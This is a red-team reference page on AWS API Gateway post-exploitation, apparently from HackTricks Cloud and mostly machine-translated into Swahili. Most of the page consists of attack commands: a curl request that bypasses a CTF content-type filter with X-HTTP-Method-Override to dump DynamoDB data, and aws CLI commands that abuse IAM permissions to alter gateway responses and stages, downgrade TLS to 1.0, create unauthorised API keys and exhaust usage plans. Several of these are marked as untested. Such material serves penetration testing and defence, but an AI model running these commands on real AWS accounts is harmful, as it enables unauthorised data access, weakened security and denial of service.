HackTricks CloudAWS - API Gateway Post Exploitation
Reading time: 6 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
API Gateway
Kwa maelezo zaidi angalia:
Kupata APIs zisizofichwa
Unaweza kuunda endpoint katika https://us-east-1.console.aws.amazon.com/vpc/home#CreateVpcEndpoint kwa service com.amazonaws.us-east-1.execute-api, expose the endpoint katika network ambayo una access (inawezekana kupitia EC2 machine) na uteue security group inayoruhusu all connections.
Kisha, kutoka kwenye EC2 machine utaweza kufikia endpoint na kwa hivyo kuita gateway API ambayo haikuwa imefichuliwa hapo awali.
Bypass Request body passthrough
This technique was found in this CTF writeup.
Kama ilivyoonyeshwa katika AWS documentation katika sehemu ya PassthroughBehavior, kwa chaguo-msingi, thamani WHEN_NO_MATCH, wakati wa kukagua header ya Content-Type ya request, itapitisha request kwa back end bila mabadiliko.
Hivyo, katika CTF API Gateway ilikuwa na integration template ambayo ilikuwa preventing the flag from being exfiltrated katika response wakati request ilitumwa na Content-Type: application/json:
RequestTemplates:
application/json: '{"TableName":"Movies","IndexName":"MovieName-Index","KeyConditionExpression":"moviename=:moviename","FilterExpression": "not contains(#description, :flagstring)","ExpressionAttributeNames": {"#description": "description"},"ExpressionAttributeValues":{":moviename":{"S":"$util.escapeJavaScript($input.params(''moviename''))"},":flagstring":{"S":"midnight"}}}'
Hata hivyo, kutuma ombi lenye Content-type: text/json kungepita filter hiyo.
Hatimaye, kwa kuwa API Gateway iliruhusu tu Get na Options, ilikuwa inawezekana kutuma query yoyote ya dynamoDB bila kikomo kwa kutuma ombi la POST na kuweka query katika mwili wa ombi na kutumia header X-HTTP-Method-Override: GET:
curl https://vu5bqggmfc.execute-api.eu-north-1.amazonaws.com/prod/movies/hackers -H 'X-HTTP-Method-Override: GET' -H 'Content-Type: text/json' --data '{"TableName":"Movies","IndexName":"MovieName-Index","KeyConditionExpression":"moviename = :moviename","ExpressionAttributeValues":{":moviename":{"S":"hackers"}}}'
Usage Plans DoS
Kwenye sehemu ya Enumeration unaweza kuona jinsi ya kupata usage plan ya keys. Ikiwa una key na ime limited kwa matumizi X per month, unaweza just use it and cause a DoS.
apigateway:UpdateGatewayResponse, apigateway:CreateDeployment
Attacker ambaye ana permissions apigateway:UpdateGatewayResponse na apigateway:CreateDeployment anaweza modify an existing Gateway Response ili kujumuisha custom headers au response templates ambazo leak maelezo nyeti au execute malicious scripts.
API_ID="your-api-id"
RESPONSE_TYPE="DEFAULT_4XX"
# Update the Gateway Response
aws apigateway update-gateway-response --rest-api-id $API_ID --response-type $RESPONSE_TYPE --patch-operations op=replace,path=/responseTemplates/application~1json,value="{\"message\":\"$context.error.message\", \"malicious_header\":\"malicious_value\"}"
# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod
Athari Inayoweza Kutokea: Uvuaji wa taarifa nyeti, kuendesha skiripti zenye madhara, au kupata ufikiaji bila idhini kwa rasilimali za API.
note
Inahitaji upimaji
apigateway:UpdateStage, apigateway:CreateDeployment
Mshambuliaji akiwa na ruhusa za apigateway:UpdateStage na apigateway:CreateDeployment anaweza kubadilisha hatua ya API Gateway iliyopo ili kupeleka trafiki kwa hatua tofauti au kubadilisha mipangilio ya caching ili kupata ufikiaji usioidhinishwa wa data zilizohifadhiwa kwenye cache.
API_ID="your-api-id"
STAGE_NAME="Prod"
# Update the API Gateway stage
aws apigateway update-stage --rest-api-id $API_ID --stage-name $STAGE_NAME --patch-operations op=replace,path=/cacheClusterEnabled,value=true,op=replace,path=/cacheClusterSize,value="0.5"
# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod
Athari Inayoweza Kutokea: Ufikiaji usioidhinishwa wa data zilizohifadhiwa (cached), kuingilia au kukamata trafiki ya API.
note
Inahitaji kujaribiwa
apigateway:PutMethodResponse, apigateway:CreateDeployment
Mshambuliaji akiwa na ruhusa apigateway:PutMethodResponse na apigateway:CreateDeployment anaweza kubadilisha method response ya API Gateway REST API iliyopo ili kujumuisha custom headers au response templates ambazo zinatoa (leak) taarifa nyeti au kutekeleza scripts hatarishi.
API_ID="your-api-id"
RESOURCE_ID="your-resource-id"
HTTP_METHOD="GET"
STATUS_CODE="200"
# Update the method response
aws apigateway put-method-response --rest-api-id $API_ID --resource-id $RESOURCE_ID --http-method $HTTP_METHOD --status-code $STATUS_CODE --response-parameters "method.response.header.malicious_header=true"
# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod
Athari Inayoweza Kutokea: Leakage ya taarifa nyeti, kutekeleza malicious scripts, au upatikanaji usioidhinishwa wa rasilimali za API.
note
Inahitaji upimaji
apigateway:UpdateRestApi, apigateway:CreateDeployment
Mshambulizi mwenye ruhusa za apigateway:UpdateRestApi na apigateway:CreateDeployment anaweza kubadilisha mipangilio ya API Gateway REST API ili kuzima logging au kubadilisha minimum TLS version, na hivyo kuweza kudhoofisha usalama wa API.
API_ID="your-api-id"
# Update the REST API settings
aws apigateway update-rest-api --rest-api-id $API_ID --patch-operations op=replace,path=/minimumTlsVersion,value='TLS_1.0',op=replace,path=/apiKeySource,value='AUTHORIZER'
# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod
Athari Inayoweza Kutokea: Kuudhiisha usalama wa API, kwa uwezekano kuwezesha ufikiaji usioidhinishwa au kufichua taarifa nyeti.
note
Inahitaji majaribio
apigateway:CreateApiKey, apigateway:UpdateApiKey, apigateway:CreateUsagePlan, apigateway:CreateUsagePlanKey
Mshambuliaji mwenye ruhusa apigateway:CreateApiKey, apigateway:UpdateApiKey, apigateway:CreateUsagePlan, na apigateway:CreateUsagePlanKey anaweza kuunda API keys mpya, kuziunganisha na usage plans, na kisha kutumia keys hizi kwa ufikiaji usioidhinishwa wa APIs.
# Create a new API key
API_KEY=$(aws apigateway create-api-key --enabled --output text --query 'id')
# Create a new usage plan
USAGE_PLAN=$(aws apigateway create-usage-plan --name "MaliciousUsagePlan" --output text --query 'id')
# Associate the API key with the usage plan
aws apigateway create-usage-plan-key --usage-plan-id $USAGE_PLAN --key-id $API_KEY --key-type API_KEY
Athari Inayowezekana: Ufikiaji usioidhinishwa wa rasilimali za API, kuzunguka udhibiti wa usalama.
note
Inahitaji kujaribiwa
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.